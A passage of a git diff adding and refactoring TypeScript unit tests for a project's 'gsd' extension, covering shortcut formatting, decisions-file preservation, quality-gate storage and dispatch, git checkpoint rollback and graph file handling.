+    assert.strictEqual(result, '⌃C');
+  } else {
+    assert.strictEqual(result, 'Ctrl+C');
+  }
+});
+
+test('formatShortcut: converts Shift modifier', () => {
+  const result = formatShortcut('Shift+Tab');
+  if (process.platform === 'darwin') {
+    assert.strictEqual(result, '⇧Tab');
+  } else {
+    assert.strictEqual(result, 'Shift+Tab');
+  }
+});
+
+test('formatShortcut: converts Cmd modifier', () => {
+  const result = formatShortcut('Cmd+S');
+  if (process.platform === 'darwin') {
+    assert.strictEqual(result, '⌘S');
+  } else {
+    assert.strictEqual(result, 'Cmd+S');
+  }
+});
+
+test('formatShortcut: passes through plain key names', () => {
+  assert.strictEqual(formatShortcut('Escape'), 'Escape');
+  assert.strictEqual(formatShortcut('Enter'), 'Enter');
+});
diff --git a/src/resources/extensions/gsd/tests/freeform-decisions.test.ts b/src/resources/extensions/gsd/tests/freeform-decisions.test.ts
new file mode 100644
index 000000000..d3f27d4a0
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/freeform-decisions.test.ts
@@ -0,0 +1,232 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import * as path from 'node:path';
+import * as os from 'node:os';
+import * as fs from 'node:fs';
+import {
+  openDatabase,
+  closeDatabase,
+} from '../gsd-db.ts';
+import {
+  parseDecisionsTable,
+} from '../md-importer.ts';
+import {
+  saveDecisionToDb,
+} from '../db-writer.ts';
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Helpers
+// ═══════════════════════════════════════════════════════════════════════════
+
+function makeTmpDir(): string {
+  const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'gsd-freeform-'));
+  fs.mkdirSync(path.join(dir, '.gsd'), { recursive: true });
+  return dir;
+}
+
+function cleanupDir(dir: string): void {
+  try {
+    fs.rmSync(dir, { recursive: true, force: true });
+  } catch { /* swallow */ }
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Bug reproduction: freeform DECISIONS.md content destroyed (#2301)
+// ═══════════════════════════════════════════════════════════════════════════
+
+describe('freeform-decisions', () => {
+  test('parseDecisionsTable silently drops freeform content', () => {
+    const freeform = `# Project Decisions
+
+  ## Architecture
+  We decided to use a microservices architecture because monoliths don't scale.
+
+  ## Database
+  PostgreSQL was chosen for its reliability and JSONB support.
+
+  ## Deployment
+  - Kubernetes for orchestration
+  - Helm charts for packaging
+  `;
+
+    const parsed = parseDecisionsTable(freeform);
+    assert.deepStrictEqual(parsed.length, 0, 'freeform content yields zero parsed decisions (expected — it is not a table)');
+  });
+
+  test('saveDecisionToDb destroys freeform DECISIONS.md content', async () => {
+    const tmpDir = makeTmpDir();
+    const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+    const mdPath = path.join(tmpDir, '.gsd', 'DECISIONS.md');
+    openDatabase(dbPath);
+
+    const freeformContent = `# Project Decisions
+
+  ## Architecture
+  We decided to use a microservices architecture because monoliths don't scale.
+
+  ## Database
+  PostgreSQL was chosen for its reliability and JSONB support.
+
+  ## Deployment
+  - Kubernetes for orchestration
+  - Helm charts for packaging
+  `;
+
+    // Pre-populate DECISIONS.md with freeform content
+    fs.writeFileSync(mdPath, freeformContent, 'utf-8');
+
+    try {
+      // Save a new decision — this should NOT destroy the freeform content
+      const result = await saveDecisionToDb({
+        scope: 'testing',
+        decision: 'Use Jest for unit tests',
+        choice: 'Jest',
+        rationale: 'Well-known, good DX',
+        when_context: 'M001',
+      }, tmpDir);
+
+      assert.deepStrictEqual(result.id, 'D001', 'decision ID assigned correctly');
+
+      // Read back the file
+      const afterContent = fs.readFileSync(mdPath, 'utf-8');
+
+      // The freeform content MUST still be present
+      assert.ok(
+        afterContent.includes('microservices architecture'),
+        'freeform architecture section preserved after saveDecisionToDb',
+      );
+      assert.ok(
+        afterContent.includes('PostgreSQL was chosen'),
+        'freeform database section preserved after saveDecisionToDb',
+      );
+      assert.ok(
+        afterContent.includes('Kubernetes for orchestration'),
+        'freeform deployment section preserved after saveDecisionToDb',
+      );
+
+      // The new decision MUST also be present
+      assert.ok(
+        afterContent.includes('D001'),
+        'new decision D001 present in file',
+      );
+      assert.ok(
+        afterContent.includes('Use Jest for unit tests'),
+        'new decision text present in file',
+      );
+
+      // Save a second decision — freeform content must still survive
+      const result2 = await saveDecisionToDb({
+        scope: 'ci',
+        decision: 'Use GitHub Actions for CI',
+        choice: 'GitHub Actions',
+        rationale: 'Native integration',
+        when_context: 'M001',
+      }, tmpDir);
+
+      assert.deepStrictEqual(result2.id, 'D002', 'second decision ID assigned correctly');
+
+      const afterContent2 = fs.readFileSync(mdPath, 'utf-8');
+
+      assert.ok(
+        afterContent2.includes('microservices architecture'),
+        'freeform content still preserved after second save',
+      );
+      assert.ok(
+        afterContent2.includes('D001'),
+        'first decision still present after second save',
+      );
+      assert.ok(
+        afterContent2.includes('D002'),
+        'second decision present after second save',
+      );
+      assert.ok(
+        afterContent2.includes('Use GitHub Actions for CI'),
+        'second decision text present in file',
+      );
+    } finally {
+      closeDatabase();
+      cleanupDir(tmpDir);
+    }
+  });
+
+  test('saveDecisionToDb with table-format DECISIONS.md still regenerates normally', async () => {
+    const tmpDir = makeTmpDir();
+    const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+    const mdPath = path.join(tmpDir, '.gsd', 'DECISIONS.md');
+    openDatabase(dbPath);
+
+    // Pre-populate with canonical table format
+    const tableContent = `# Decisions Register
+
+  <!-- Append-only. Never edit or remove existing rows.
+       To reverse a decision, add a new row that supersedes it.
+       Read this file at the start of any planning or research phase. -->
+
+  | # | When | Scope | Decision | Choice | Rationale | Revisable? | Made By |
+  |---|------|-------|----------|--------|-----------|------------|---------|
+  | D001 | M001 | arch | Use REST API | REST | Simpler | Yes | human |
+  `;
+
+    fs.writeFileSync(mdPath, tableContent, 'utf-8');
+
+    try {
+      const result = await saveDecisionToDb({
+        scope: 'testing',
+        decision: 'Use Vitest',
+        choice: 'Vitest',
+        rationale: 'Fast',
+        when_context: 'M001',
+      }, tmpDir);
+
+      // The pre-existing table decision was NOT in DB, so it won't appear after regen.
+      // But the new decision should be there.
+      assert.deepStrictEqual(result.id, 'D001', 'gets D001 since DB was empty');
+
+      const afterContent = fs.readFileSync(mdPath, 'utf-8');
+      // Table-format file gets fully regenerated — this is the normal path
+      assert.ok(
+        afterContent.includes('# Decisions Register'),
+        'table-format file still has header after save',
+      );
+      assert.ok(
+        afterContent.includes('Use Vitest'),
+        'new decision present in regenerated table',
+      );
+    } finally {
+      closeDatabase();
+      cleanupDir(tmpDir);
+    }
+  });
+
+  test('saveDecisionToDb with no existing DECISIONS.md creates table', async () => {
+    const tmpDir = makeTmpDir();
+    const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+    const mdPath = path.join(tmpDir, '.gsd', 'DECISIONS.md');
+    openDatabase(dbPath);
+
+    // No DECISIONS.md exists at all
+    assert.ok(!fs.existsSync(mdPath), 'DECISIONS.md does not exist initially');
+
+    try {
+      const result = await saveDecisionToDb({
+        scope: 'arch',
+        decision: 'Brand new decision',
+        choice: 'Option A',
+        rationale: 'Best fit',
+      }, tmpDir);
+
+      assert.deepStrictEqual(result.id, 'D001', 'first decision gets D001');
+      assert.ok(fs.existsSync(mdPath), 'DECISIONS.md created');
+
+      const content = fs.readFileSync(mdPath, 'utf-8');
+      assert.ok(content.includes('# Decisions Register'), 'new file has header');
+      assert.ok(content.includes('Brand new decision'), 'new file has decision');
+    } finally {
+      closeDatabase();
+      cleanupDir(tmpDir);
+    }
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+
+});
diff --git a/src/resources/extensions/gsd/tests/frontmatter-parse-noise.test.ts b/src/resources/extensions/gsd/tests/frontmatter-parse-noise.test.ts
new file mode 100644
index 000000000..802c73caa
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/frontmatter-parse-noise.test.ts
@@ -0,0 +1,42 @@
+/**
+ * Regression test for #3693 — suppress repeated frontmatter parse warnings
+ *
+ * parseFrontmatterBlock was logging a YAML parse warning on every call.
+ * The fix adds a _warnedFrontmatterParse flag so the warning only fires once.
+ */
+
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const prefsSrc = readFileSync(
+  join(__dirname, '..', 'preferences.ts'),
+  'utf-8',
+);
+
+describe('frontmatter parse noise suppression (#3693)', () => {
+  test('_warnedFrontmatterParse flag is defined', () => {
+    assert.match(prefsSrc, /_warnedFrontmatterParse/,
+      '_warnedFrontmatterParse flag should exist in preferences.ts');
+  });
+
+  test('parseFrontmatterBlock function exists', () => {
+    assert.match(prefsSrc, /function parseFrontmatterBlock\(/,
+      'parseFrontmatterBlock function should be defined');
+  });
+
+  test('flag is checked before warning', () => {
+    assert.match(prefsSrc, /if\s*\(\s*!_warnedFrontmatterParse\s*\)/,
+      'should check !_warnedFrontmatterParse before logging');
+  });
+
+  test('flag is set to true after first warning', () => {
+    assert.match(prefsSrc, /_warnedFrontmatterParse\s*=\s*true/,
+      'should set _warnedFrontmatterParse = true after warning');
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/gate-dispatch.test.ts b/src/resources/extensions/gsd/tests/gate-dispatch.test.ts
new file mode 100644
index 000000000..3b18a2fbf
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/gate-dispatch.test.ts
@@ -0,0 +1,189 @@
+// Quality gate dispatch + state derivation tests
+// Verifies the evaluating-gates phase and dispatch rule behavior.
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  upsertSlicePlanning,
+  upsertTaskPlanning,
+  insertGateRow,
+  saveGateResult,
+  markAllGatesOmitted,
+  getPendingSliceGateCount,
+} from "../gsd-db.ts";
+import { deriveState, invalidateStateCache } from "../state.ts";
+import { renderPlanFromDb } from "../markdown-renderer.ts";
+import { invalidateAllCaches } from "../cache.ts";
+
+function setupTestProject(): { tmpDir: string; dbPath: string } {
+  const tmpDir = mkdtempSync(join(tmpdir(), "gate-dispatch-"));
+  const dbPath = join(tmpDir, ".gsd", "gsd.db");
+  mkdirSync(join(tmpDir, ".gsd"), { recursive: true });
+  openDatabase(dbPath);
+
+  // Create milestone
+  insertMilestone({
+    id: "M001",
+    title: "Test Milestone",
+    status: "active",
+  });
+
+  // Create slice
+  insertSlice({
+    milestoneId: "M001",
+    id: "S01",
+    title: "Test Slice",
+    status: "pending",
+    risk: "medium",
+    depends: [],
+  });
+
+  // Write roadmap file (required for deriveState)
+  const milestoneDir = join(tmpDir, ".gsd", "milestones", "M001");
+  mkdirSync(milestoneDir, { recursive: true });
+  writeFileSync(
+    join(milestoneDir, "M001-ROADMAP.md"),
+    [
+      "# M001: Test Milestone",
+      "",
+      "## Vision",
+      "Test milestone vision.",
+      "",
+      "## Success Criteria",
+      "- Test criteria",
+      "",
+      "## Delivery Sequence",
+      "- [ ] **S01: Test Slice** `risk:medium`",
+      "  After this: test demo",
+      "",
+    ].join("\n"),
+  );
+
+  return { tmpDir, dbPath };
+}
+
+function planSlice(tmpDir: string) {
+  upsertSlicePlanning("M001", "S01", {
+    goal: "Test goal",
+    successCriteria: "Test criteria",
+    proofLevel: "contract",
+    integrationClosure: "",
+    observabilityImpact: "Run tests",
+  });
+  insertTask({
+    id: "T01",
+    sliceId: "S01",
+    milestoneId: "M001",
+    title: "Test Task",
+    status: "pending",
+  });
+  upsertTaskPlanning("M001", "S01", "T01", {
+    title: "Test Task",
+    description: "Implement test",
+    estimate: "1h",
+    files: ["src/test.ts"],
+    verify: "npm test",
+    inputs: [],
+    expectedOutput: ["src/test.ts"],
+    observabilityImpact: "",
+    fullPlanMd: "",
+  });
+}
+
+describe("evaluating-gates phase", () => {
+  let tmpDir: string;
+
+  beforeEach(() => {
+    const setup = setupTestProject();
+    tmpDir = setup.tmpDir;
+  });
+
+  afterEach(() => {
+    invalidateAllCaches();
+    invalidateStateCache();
+    closeDatabase();
+    rmSync(tmpDir, { recursive: true, force: true });
+  });
+
+  test("state returns evaluating-gates when slice gates are pending", async () => {
+    planSlice(tmpDir);
+    await renderPlanFromDb(tmpDir, "M001", "S01");
+
+    // Seed gates as pending
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q3", scope: "slice" });
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q4", scope: "slice" });
+
+    invalidateStateCache();
+    const state = await deriveState(tmpDir);
+    assert.equal(state.phase, "evaluating-gates");
+    assert.ok(state.nextAction.includes("quality gate"));
+  });
+
+  test("state returns executing when all gates are resolved", async () => {
+    planSlice(tmpDir);
+    await renderPlanFromDb(tmpDir, "M001", "S01");
+
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q3", scope: "slice" });
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q4", scope: "slice" });
+
+    saveGateResult({ milestoneId: "M001", sliceId: "S01", gateId: "Q3", verdict: "pass", rationale: "OK", findings: "" });
+    saveGateResult({ milestoneId: "M001", sliceId: "S01", gateId: "Q4", verdict: "omitted", rationale: "N/A", findings: "" });
+
+    invalidateStateCache();
+    const state = await deriveState(tmpDir);
+    assert.equal(state.phase, "executing");
+  });
+
+  test("state returns executing when no gates exist (backward compat)", async () => {
+    planSlice(tmpDir);
+    await renderPlanFromDb(tmpDir, "M001", "S01");
+
+    // No gates seeded at all
+    invalidateStateCache();
+    const state = await deriveState(tmpDir);
+    assert.equal(state.phase, "executing");
+  });
+
+  test("markAllGatesOmitted clears evaluating-gates phase", async () => {
+    planSlice(tmpDir);
+    await renderPlanFromDb(tmpDir, "M001", "S01");
+
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q3", scope: "slice" });
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q4", scope: "slice" });
+
+    invalidateStateCache();
+    assert.equal((await deriveState(tmpDir)).phase, "evaluating-gates");
+
+    markAllGatesOmitted("M001", "S01");
+    invalidateStateCache();
+    assert.equal((await deriveState(tmpDir)).phase, "executing");
+  });
+
+  test("task-scoped gates do not block evaluating-gates phase", async () => {
+    planSlice(tmpDir);
+    await renderPlanFromDb(tmpDir, "M001", "S01");
+
+    // Only task-scoped gates — no slice-scoped gates
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q5", scope: "task", taskId: "T01" });
+
+    invalidateStateCache();
+    const state = await deriveState(tmpDir);
+    // Should be executing, not evaluating-gates, because Q5 is task-scoped
+    assert.equal(state.phase, "executing");
+  });
+
+  test("getPendingSliceGateCount ignores task-scoped gates", () => {
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q3", scope: "slice" });
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q5", scope: "task", taskId: "T01" });
+    assert.equal(getPendingSliceGateCount("M001", "S01"), 1);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/gate-storage.test.ts b/src/resources/extensions/gsd/tests/gate-storage.test.ts
new file mode 100644
index 000000000..6b903ed7d
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/gate-storage.test.ts
@@ -0,0 +1,156 @@
+// Quality gate DB storage tests
+// Verifies CRUD operations on the quality_gates table.
+
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import {
+  openDatabase,
+  closeDatabase,
+  insertGateRow,
+  saveGateResult,
+  getPendingGates,
+  getGateResults,
+  markAllGatesOmitted,
+  getPendingSliceGateCount,
+  insertMilestone,
+  insertSlice,
+} from "../gsd-db.ts";
+
+describe("quality_gates CRUD", () => {
+  let tmpDir: string;
+  let dbPath: string;
+
+  beforeEach(() => {
+    tmpDir = mkdtempSync(join(tmpdir(), "gate-test-"));
+    dbPath = join(tmpDir, "gsd.db");
+    openDatabase(dbPath);
+    // Seed parent rows
+    insertMilestone({
+      id: "M001",
+      title: "Test Milestone",
+      status: "active",
+    });
+    insertSlice({
+      milestoneId: "M001",
+      id: "S01",
+      title: "Test Slice",
+      status: "pending",
+      risk: "medium",
+      depends: [],
+    });
+  });
+
+  afterEach(() => {
+    closeDatabase();
+    rmSync(tmpDir, { recursive: true, force: true });
+  });
+
+  test("insertGateRow creates a pending gate", () => {
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q3", scope: "slice" });
+    const pending = getPendingGates("M001", "S01");
+    assert.equal(pending.length, 1);
+    assert.equal(pending[0].gate_id, "Q3");
+    assert.equal(pending[0].status, "pending");
+    assert.equal(pending[0].scope, "slice");
+  });
+
+  test("insertGateRow with INSERT OR IGNORE is idempotent", () => {
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q3", scope: "slice" });
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q3", scope: "slice" });
+    const all = getGateResults("M001", "S01");
+    assert.equal(all.length, 1);
+  });
+
+  test("saveGateResult updates status and verdict", () => {
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q3", scope: "slice" });
+    saveGateResult({
+      milestoneId: "M001",
+      sliceId: "S01",
+      gateId: "Q3",
+      verdict: "pass",
+      rationale: "No auth surface",
+      findings: "This slice has no user-facing endpoints.",
+    });
+    const results = getGateResults("M001", "S01");
+    assert.equal(results.length, 1);
+    assert.equal(results[0].status, "complete");
+    assert.equal(results[0].verdict, "pass");
+    assert.equal(results[0].rationale, "No auth surface");
+    assert.ok(results[0].evaluated_at);
+  });
+
+  test("getPendingGates filters by scope", () => {
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q3", scope: "slice" });
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q5", scope: "task", taskId: "T01" });
+
+    const sliceGates = getPendingGates("M001", "S01", "slice");
+    assert.equal(sliceGates.length, 1);
+    assert.equal(sliceGates[0].gate_id, "Q3");
+
+    const taskGates = getPendingGates("M001", "S01", "task");
+    assert.equal(taskGates.length, 1);
+    assert.equal(taskGates[0].gate_id, "Q5");
+  });
+
+  test("markAllGatesOmitted marks all pending gates as omitted", () => {
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q3", scope: "slice" });
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q4", scope: "slice" });
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q5", scope: "task", taskId: "T01" });
+
+    markAllGatesOmitted("M001", "S01");
+
+    const pending = getPendingGates("M001", "S01");
+    assert.equal(pending.length, 0);
+
+    const all = getGateResults("M001", "S01");
+    assert.equal(all.length, 3);
+    for (const g of all) {
+      assert.equal(g.status, "omitted");
+      assert.equal(g.verdict, "omitted");
+    }
+  });
+
+  test("getPendingSliceGateCount returns correct count", () => {
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q3", scope: "slice" });
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q4", scope: "slice" });
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q5", scope: "task", taskId: "T01" });
+
+    assert.equal(getPendingSliceGateCount("M001", "S01"), 2);
+
+    saveGateResult({
+      milestoneId: "M001", sliceId: "S01", gateId: "Q3",
+      verdict: "pass", rationale: "OK", findings: "",
+    });
+    assert.equal(getPendingSliceGateCount("M001", "S01"), 1);
+  });
+
+  test("task-scoped gates with different task_id are distinct", () => {
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q5", scope: "task", taskId: "T01" });
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q5", scope: "task", taskId: "T02" });
+
+    const all = getGateResults("M001", "S01", "task");
+    assert.equal(all.length, 2);
+  });
+
+  test("getGateResults returns empty for nonexistent slice", () => {
+    const results = getGateResults("M001", "S99");
+    assert.equal(results.length, 0);
+  });
+
+  test("saveGateResult with flag verdict preserves findings", () => {
+    insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q4", scope: "slice" });
+    saveGateResult({
+      milestoneId: "M001", sliceId: "S01", gateId: "Q4",
+      verdict: "flag", rationale: "Breaks R003",
+      findings: "## R003 Impact\n\n- Login flow must be re-tested\n- Session token format changed",
+    });
+    const results = getGateResults("M001", "S01", "slice");
+    const q4 = results.find(g => g.gate_id === "Q4")!;
+    assert.equal(q4.verdict, "flag");
+    assert.ok(q4.findings.includes("R003 Impact"));
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/git-checkpoint.test.ts b/src/resources/extensions/gsd/tests/git-checkpoint.test.ts
new file mode 100644
index 000000000..33cd3829f
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/git-checkpoint.test.ts
@@ -0,0 +1,94 @@
+// GSD2 — Regression tests for git-checkpoint rollback (#3576)
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, writeFileSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { execFileSync } from "node:child_process";
+import { createCheckpoint, rollbackToCheckpoint, cleanupCheckpoint } from "../safety/git-checkpoint.js";
+
+function git(args: string[], cwd: string): string {
+  return execFileSync("git", args, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
+}
+
+function createTempRepo(): string {
+  const dir = mkdtempSync(join(tmpdir(), "ckpt-test-"));
+  git(["init"], dir);
+  git(["config", "user.email", "test@test.com"], dir);
+  git(["config", "user.name", "Test"], dir);
+  writeFileSync(join(dir, "file.txt"), "initial\n");
+  git(["add", "."], dir);
+  git(["commit", "-m", "init"], dir);
+  git(["branch", "-M", "main"], dir);
+  return dir;
+}
+
+describe("git-checkpoint rollback", () => {
+  it("rolls back to checkpoint on checked-out branch", (t) => {
+    const repo = createTempRepo();
+    t.after(() => rmSync(repo, { recursive: true, force: true }));
+
+    // Create checkpoint at initial commit
+    const sha = createCheckpoint(repo, "unit-1");
+    assert.ok(sha, "checkpoint should return a SHA");
+
+    // Make a second commit
+    writeFileSync(join(repo, "file.txt"), "modified\n");
+    git(["add", "."], repo);
+    git(["commit", "-m", "second"], repo);
+
+    const headBefore = git(["rev-parse", "HEAD"], repo);
+    assert.notEqual(headBefore, sha, "HEAD should have advanced");
+
+    // Rollback — this must work on the checked-out branch
+    const result = rollbackToCheckpoint(repo, "unit-1", sha);
+    assert.equal(result, true, "rollback should succeed");
+
+    const headAfter = git(["rev-parse", "HEAD"], repo);
+    assert.equal(headAfter, sha, "HEAD should match checkpoint SHA after rollback");
+  });
+
+  it("returns false on detached HEAD", (t) => {
+    const repo = createTempRepo();
+    t.after(() => rmSync(repo, { recursive: true, force: true }));
+
+    const sha = git(["rev-parse", "HEAD"], repo);
+    git(["checkout", "--detach", sha], repo);
+
+    const result = rollbackToCheckpoint(repo, "unit-2", sha);
+    assert.equal(result, false, "rollback should fail on detached HEAD");
+  });
+
+  it("cleans up checkpoint ref after rollback", (t) => {
+    const repo = createTempRepo();
+    t.after(() => rmSync(repo, { recursive: true, force: true }));
+
+    const sha = createCheckpoint(repo, "unit-3");
+    assert.ok(sha);
+
+    // Ref should exist
+    const refBefore = git(["for-each-ref", "refs/gsd/checkpoints/unit-3", "--format=%(objectname)"], repo);
+    assert.equal(refBefore, sha);
+
+    rollbackToCheckpoint(repo, "unit-3", sha);
+
+    // Ref should be cleaned up
+    const refAfter = git(["for-each-ref", "refs/gsd/checkpoints/unit-3", "--format=%(objectname)"], repo);
+    assert.equal(refAfter, "", "checkpoint ref should be removed after rollback");
+  });
+
+  it("cleanupCheckpoint removes the ref without error", (t) => {
+    const repo = createTempRepo();
+    t.after(() => rmSync(repo, { recursive: true, force: true }));
+
+    const sha = createCheckpoint(repo, "unit-4");
+    assert.ok(sha);
+
+    cleanupCheckpoint(repo, "unit-4");
+
+    const ref = git(["for-each-ref", "refs/gsd/checkpoints/unit-4", "--format=%(objectname)"], repo);
+    assert.equal(ref, "", "ref should be gone");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/gitignore-bg-shell.test.ts b/src/resources/extensions/gsd/tests/gitignore-bg-shell.test.ts
new file mode 100644
index 000000000..5060b08a9
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/gitignore-bg-shell.test.ts
@@ -0,0 +1,38 @@
+/**
+ * Regression test — .bg-shell/ added to BASELINE_PATTERNS in gitignore.ts
+ *
+ * The bg-shell background process directory was not included in the
+ * baseline gitignore patterns, causing it to appear as untracked in
+ * git status and potentially be committed.
+ *
+ * Structural verification test — reads source to confirm .bg-shell/
+ * is in BASELINE_PATTERNS.
+ */
+
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const source = readFileSync(join(__dirname, '..', 'gitignore.ts'), 'utf-8');
+
+describe('.bg-shell/ in BASELINE_PATTERNS', () => {
+  test('BASELINE_PATTERNS array is defined', () => {
+    assert.match(source, /const BASELINE_PATTERNS\s*=/,
+      'BASELINE_PATTERNS should be defined');
+  });
+
+  test('.bg-shell/ is included in BASELINE_PATTERNS', () => {
+    // Extract the BASELINE_PATTERNS array content
+    const patternsStart = source.indexOf('BASELINE_PATTERNS');
+    const arrayStart = source.indexOf('[', patternsStart);
+    const arrayEnd = source.indexOf('] as const', arrayStart);
+    const patternsContent = source.slice(arrayStart, arrayEnd);
+    assert.match(patternsContent, /\.bg-shell\//,
+      '.bg-shell/ should be in BASELINE_PATTERNS');
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/graph-operations.test.ts b/src/resources/extensions/gsd/tests/graph-operations.test.ts
index 229557c0d..c73696604 100644
--- a/src/resources/extensions/gsd/tests/graph-operations.test.ts
+++ b/src/resources/extensions/gsd/tests/graph-operations.test.ts
@@ -56,7 +56,7 @@ function makeStep(overrides: Partial<GraphStep> & { id: string }): GraphStep {
 // ─── writeGraph + readGraph round-trip ───────────────────────────────────
 
 describe("writeGraph + readGraph round-trip", () => {
-  it("preserves all fields including parentStepId and dependsOn", () => {
+  it("preserves all fields including parentStepId and dependsOn", (t) => {
     const dir = makeTmpDir();
     try {
       const graph = makeGraph([
@@ -89,7 +89,7 @@ describe("writeGraph + readGraph round-trip", () => {
     }
   });
 
-  it("preserves startedAt and finishedAt fields", () => {
+  it("preserves startedAt and finishedAt fields", (t) => {
     const dir = makeTmpDir();
     try {
       const graph = makeGraph([
@@ -110,7 +110,7 @@ describe("writeGraph + readGraph round-trip", () => {
     }
   });
 
-  it("creates directory if it does not exist", () => {
+  it("creates directory if it does not exist", (t) => {
     const base = makeTmpDir();
     const nested = join(base, "sub", "dir");
     try {
@@ -129,59 +129,53 @@ describe("writeGraph + readGraph round-trip", () => {
 // ─── readGraph error paths ───────────────────────────────────────────────
 
 describe("readGraph error paths", () => {
-  it("throws with descriptive error when file is missing", () => {
+  it("throws with descriptive error when file is missing", (t) => {
     const dir = makeTmpDir();
-    try {
-      assert.throws(
-        () => readGraph(dir),
-        (err: Error) => {
-          assert.ok(err.message.includes("GRAPH.yaml not found"));
-          assert.ok(err.message.includes(dir));
-          return true;
-        },
-      );
-    } finally {
-      cleanupDir(dir);
-    }
+    t.after(() => { cleanupDir(dir); });
+
+    assert.throws(
+      () => readGraph(dir),
+      (err: Error) => {
+        assert.ok(err.message.includes("GRAPH.yaml not found"));
+        assert.ok(err.message.includes(dir));
+        return true;
+      },
+    );
   });
 
-  it("throws with descriptive error when YAML is malformed (missing steps)", () => {
+  it("throws with descriptive error when YAML is malformed (missing steps)", (t) => {
     const dir = makeTmpDir();
-    try {
-      writeFileSync(join(dir, "GRAPH.yaml"), "metadata:\n  name: bad\n", "utf-8");
-      assert.throws(
-        () => readGraph(dir),
-        (err: Error) => {
-          assert.ok(err.message.includes("missing or invalid 'steps' array"));
-          return true;
-        },
-      );
-    } finally {
-      cleanupDir(dir);
-    }
+    t.after(() => { cleanupDir(dir); });
+
+    writeFileSync(join(dir, "GRAPH.yaml"), "metadata:\n  name: bad\n", "utf-8");
+    assert.throws(
+      () => readGraph(dir),
+      (err: Error) => {
+        assert.ok(err.message.includes("missing or invalid 'steps' array"));
+        return true;
+      },
+    );
   });
 
-  it("throws when steps is not an array", () => {
+  it("throws when steps is not an array", (t) => {
     const dir = makeTmpDir();
-    try {
-      writeFileSync(join(dir, "GRAPH.yaml"), "steps: not-an-array\nmetadata:\n  name: bad\n", "utf-8");
-      assert.throws(
-        () => readGraph(dir),
-        (err: Error) => {
-          assert.ok(err.message.includes("missing or invalid 'steps' array"));
-          return true;
-        },
-      );
-    } finally {
-      cleanupDir(dir);
-    }
+    t.after(() => { cleanupDir(dir); });
+
+    writeFileSync(join(dir, "GRAPH.yaml"), "steps: not-an-array\nmetadata:\n  name: bad\n", "utf-8");
+    assert.throws(
+      () => readGraph(dir),
+      (err: Error) => {
+        assert.ok(err.message.includes("missing or invalid 'steps' array"));
+        return true;
+      },
+    );
   });
 });
 
 // ─── getNextPendingStep ──────────────────────────────────────────────────
 
 describe("getNextPendingStep", () => {
-  it("returns first step with all deps complete", () => {
+  it("returns first step with all deps complete", (t) => {
     const graph = makeGraph([
       makeStep({ id: "a", status: "complete" }),
       makeStep({ id: "b", dependsOn: ["a"] }),
@@ -192,7 +186,7 @@ describe("getNextPendingStep", () => {
